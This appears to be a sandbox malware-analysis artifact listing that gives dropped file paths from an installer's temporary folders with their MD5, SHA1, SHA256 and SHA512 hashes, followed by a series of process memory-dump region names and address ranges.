C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KVI8WOM8Z2NW81M0H5E0.temp

MD5 56b2ae330cf3159e33f26ed9bfb26f5e
SHA1 fe0bcf8e8afd1596c7a0881e97e5521615a3a679
SHA256 1a4b7cc98b75ec3a757fd51e019319523961674f4bd4ff079c02181c070a26bd
SHA512 9ce981037211b7b4fed192dad9ffa7453d5501d12f124f4785a58febebfbbf54e6bad90a1865d44dc0f37fc31b8618677511f73cfe94dae0e68d221ade72d1e0

C:\Users\Admin\AppData\Local\Temp\is-TM4GU.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-TM4GU.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2136-178-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2136-177-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2136-176-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2136-175-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2136-173-0x0000000000400000-0x000000000051C000-memory.dmp

memory/372-204-0x00000000022B0000-0x0000000002445000-memory.dmp

memory/372-205-0x00000000027D0000-0x0000000002875000-memory.dmp

memory/372-209-0x0000000002880000-0x0000000002912000-memory.dmp

memory/372-206-0x0000000002880000-0x0000000002912000-memory.dmp

memory/1288-223-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1288-221-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2920-248-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2920-246-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2920-245-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2920-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2920-242-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2920-240-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2920-238-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2980-235-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2980-234-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2980-233-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2980-232-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2980-230-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2980-228-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2980-226-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2980-224-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1288-220-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1288-219-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1288-217-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1288-215-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1288-213-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1288-211-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2136-263-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2136-262-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2136-261-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2136-260-0x000000006B280000-0x000000006B2A6000-memory.dmp